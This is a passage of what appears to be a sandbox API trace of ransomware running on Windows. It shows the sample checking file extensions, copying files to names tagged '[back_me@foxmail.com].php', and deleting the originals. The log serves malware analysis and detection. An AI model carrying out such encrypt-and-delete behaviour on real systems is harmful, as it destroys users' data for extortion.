lpString2=".ini") returned -1 [0241.552] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.552] lstrlenW (lpString=".1cd") returned 4 [0241.552] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0241.552] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0241.552] lstrlenW (lpString=".jpg") returned 4 [0241.552] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0241.552] lstrcmpiW (lpString1=".LOG", lpString2=".php") returned -1 [0241.552] lstrlenW (lpString="BCD.LOG") returned 7 [0241.552] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.552] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString=".doc") returned 4 [0241.553] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0241.553] lstrlenW (lpString=".docx") returned 5 [0241.553] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0241.553] lstrlenW (lpString=".pdf") returned 4 [0241.553] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0241.553] lstrlenW (lpString=".xls") returned 4 [0241.553] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0241.553] lstrlenW (lpString=".xlsx") returned 5 [0241.553] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0241.553] lstrlenW (lpString=".ppt") returned 4 [0241.553] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0241.553] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString=".zip") returned 4 [0241.553] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0241.553] lstrlenW (lpString=".rar") returned 4 [0241.553] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0241.553] lstrlenW (lpString=".bz2") returned 4 [0241.553] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0241.553] lstrlenW (lpString=".7z") returned 3 [0241.553] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0241.553] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString=".dbf") returned 4 [0241.553] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0241.553] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString=".1cd") returned 4 [0241.553] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0241.553] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.553] lstrlenW (lpString=".jpg") returned 4 [0241.553] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.554] lstrlenW (lpString=".doc") returned 4 [0241.554] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0241.554] lstrlenW (lpString=".docx") returned 5 [0241.554] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0241.554] lstrlenW (lpString=".pdf") returned 4 [0241.554] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0241.554] lstrlenW (lpString=".xls") returned 4 [0241.554] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0241.554] lstrlenW (lpString=".xlsx") returned 5 [0241.554] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0241.554] lstrlenW (lpString=".ppt") returned 4 [0241.554] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.554] lstrlenW (lpString=".zip") returned 4 [0241.554] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0241.554] lstrlenW (lpString=".rar") returned 4 [0241.554] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0241.554] lstrlenW (lpString=".bz2") returned 4 [0241.554] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0241.554] lstrlenW (lpString=".7z") returned 3 [0241.554] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.554] lstrlenW (lpString=".dbf") returned 4 [0241.554] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.554] lstrlenW (lpString=".1cd") returned 4 [0241.554] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0241.554] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0241.555] lstrlenW (lpString=".jpg") returned 4 [0241.555] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0241.555] lstrcmpiW (lpString1=".log", lpString2=".php") returned -1 [0241.555] lstrlenW (lpString="bootex.log") returned 10 [0241.555] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.724] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=5120) returned 1 [0241.730] CloseHandle (hObject=0x2bc) returned 1 [0241.732] GetFileAttributesW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 0x80 [0241.732] GetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootex.log.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.734] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.740] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0241.740] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0241.740] CreateFileW (lpFileName="C:\\bootex.log.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\bootex.log.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0241.919] GetLastError () returned 0x0 [0241.919] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x342fed4*=0x1400, lpOverlapped=0x0) returned 1 [0241.931] WriteFile (in: hFile=0x2e8, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x342fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0241.932] ReadFile (in: hFile=0x2bc, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0241.932] WriteFile (in: hFile=0x2e8, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x342fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0241.932] SetEndOfFile (hFile=0x2e8) returned 1 [0241.933] CloseHandle (hObject=0x2e8) returned 1 [0241.933] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0241.933] SetEndOfFile (hFile=0x2bc) returned 1 [0241.933] CloseHandle (hObject=0x2bc) returned 1 [0241.933] SetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x80) returned 1 [0241.934] DeleteFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 1 [0241.934] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.934] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.934] lstrlenW (lpString=".doc") returned 4 [0241.934] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0241.934] lstrlenW (lpString=".docx") returned 5 [0241.934] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0241.934] lstrlenW (lpString=".pdf") returned 4 [0241.934] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0241.934] lstrlenW (lpString=".xls") returned 4 [0241.934] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0241.934] lstrlenW (lpString=".xlsx") returned 5 [0241.934] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0241.934] lstrlenW (lpString=".ppt") returned 4 [0241.934] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0241.934] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.934] lstrlenW (lpString=".zip") returned 4 [0241.934] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0241.934] lstrlenW (lpString=".rar") returned 4 [0241.935] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0241.935] lstrlenW (lpString=".bz2") returned 4 [0241.935] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0241.935] lstrlenW (lpString=".7z") returned 3 [0241.935] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0241.935] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.935] lstrlenW (lpString=".dbf") returned 4 [0241.935] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0241.935] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.935] lstrlenW (lpString=".1cd") returned 4 [0241.935] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0241.935] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.935] lstrlenW (lpString=".jpg") returned 4 [0241.935] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0241.935] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.935] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.935] lstrlenW (lpString=".doc") returned 4 [0241.935] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0241.935] lstrlenW (lpString=".docx") returned 5 [0241.935] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0241.935] lstrlenW (lpString=".pdf") returned 4 [0241.935] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0241.935] lstrlenW (lpString=".xls") returned 4 [0241.935] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0241.935] lstrlenW (lpString=".xlsx") returned 5 [0241.935] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0241.935] lstrlenW (lpString=".ppt") returned 4 [0241.936] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0241.936] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.936] lstrlenW (lpString=".zip") returned 4 [0241.936] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0241.936] lstrlenW (lpString=".rar") returned 4 [0241.936] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0241.936] lstrlenW (lpString=".bz2") returned 4 [0241.936] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0241.936] lstrlenW (lpString=".7z") returned 3 [0241.936] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0241.936] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.936] lstrlenW (lpString=".dbf") returned 4 [0241.936] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0241.936] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.936] lstrlenW (lpString=".1cd") returned 4 [0241.936] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0241.936] lstrlenW (lpString="C:\\bootex.log") returned 13 [0241.936] lstrlenW (lpString=".jpg") returned 4 [0241.936] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0241.936] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.936] lstrlenW (lpString="base_rtl.xml") returned 12 [0241.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.938] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=617) returned 1 [0241.938] CloseHandle (hObject=0x2bc) returned 1 [0241.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0x20 [0241.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.938] lstrlenW (lpString=".doc") returned 4 [0241.939] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString=".docx") returned 5 [0241.939] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0241.939] lstrlenW (lpString=".pdf") returned 4 [0241.939] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString=".xls") returned 4 [0241.939] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString=".xlsx") returned 5 [0241.939] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0241.939] lstrlenW (lpString=".ppt") returned 4 [0241.939] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.939] lstrlenW (lpString=".zip") returned 4 [0241.939] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.939] lstrlenW (lpString=".rar") returned 4 [0241.939] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString=".bz2") returned 4 [0241.939] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString=".7z") returned 3 [0241.939] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.939] lstrlenW (lpString=".dbf") returned 4 [0241.939] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.939] lstrlenW (lpString=".1cd") returned 4 [0241.939] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.939] lstrlenW (lpString=".jpg") returned 4 [0241.939] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.940] lstrlenW (lpString=".doc") returned 4 [0241.940] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString=".docx") returned 5 [0241.940] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0241.940] lstrlenW (lpString=".pdf") returned 4 [0241.940] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString=".xls") returned 4 [0241.940] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString=".xlsx") returned 5 [0241.940] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0241.940] lstrlenW (lpString=".ppt") returned 4 [0241.940] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.940] lstrlenW (lpString=".zip") returned 4 [0241.940] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.940] lstrlenW (lpString=".rar") returned 4 [0241.940] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString=".bz2") returned 4 [0241.940] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString=".7z") returned 3 [0241.940] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.940] lstrlenW (lpString=".dbf") returned 4 [0241.940] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.941] lstrlenW (lpString=".1cd") returned 4 [0241.941] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0241.941] lstrlenW (lpString=".jpg") returned 4 [0241.941] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.941] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.941] lstrlenW (lpString="ko-kr.xml") returned 9 [0241.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.941] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=15097) returned 1 [0241.941] CloseHandle (hObject=0x2bc) returned 1 [0241.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0x20 [0241.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.941] lstrlenW (lpString=".doc") returned 4 [0241.941] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString=".docx") returned 5 [0241.942] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0241.942] lstrlenW (lpString=".pdf") returned 4 [0241.942] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString=".xls") returned 4 [0241.942] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString=".xlsx") returned 5 [0241.942] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0241.942] lstrlenW (lpString=".ppt") returned 4 [0241.942] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.942] lstrlenW (lpString=".zip") returned 4 [0241.942] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.942] lstrlenW (lpString=".rar") returned 4 [0241.942] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString=".bz2") returned 4 [0241.942] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString=".7z") returned 3 [0241.942] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.942] lstrlenW (lpString=".dbf") returned 4 [0241.942] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.942] lstrlenW (lpString=".1cd") returned 4 [0241.942] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.942] lstrlenW (lpString=".jpg") returned 4 [0241.942] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.943] lstrlenW (lpString=".doc") returned 4 [0241.943] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString=".docx") returned 5 [0241.943] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0241.943] lstrlenW (lpString=".pdf") returned 4 [0241.943] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString=".xls") returned 4 [0241.943] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString=".xlsx") returned 5 [0241.943] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0241.943] lstrlenW (lpString=".ppt") returned 4 [0241.943] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.943] lstrlenW (lpString=".zip") returned 4 [0241.943] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.943] lstrlenW (lpString=".rar") returned 4 [0241.943] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString=".bz2") returned 4 [0241.943] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString=".7z") returned 3 [0241.943] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.943] lstrlenW (lpString=".dbf") returned 4 [0241.943] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.944] lstrlenW (lpString=".1cd") returned 4 [0241.944] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0241.944] lstrlenW (lpString=".jpg") returned 4 [0241.944] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.944] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.944] lstrlenW (lpString="zh-changjei.xml") returned 15 [0241.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.945] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=9803) returned 1 [0241.945] CloseHandle (hObject=0x2bc) returned 1 [0241.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml")) returned 0x20 [0241.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.945] lstrlenW (lpString=".doc") returned 4 [0241.945] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.945] lstrlenW (lpString=".docx") returned 5 [0241.945] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0241.945] lstrlenW (lpString=".pdf") returned 4 [0241.945] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.945] lstrlenW (lpString=".xls") returned 4 [0241.945] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.945] lstrlenW (lpString=".xlsx") returned 5 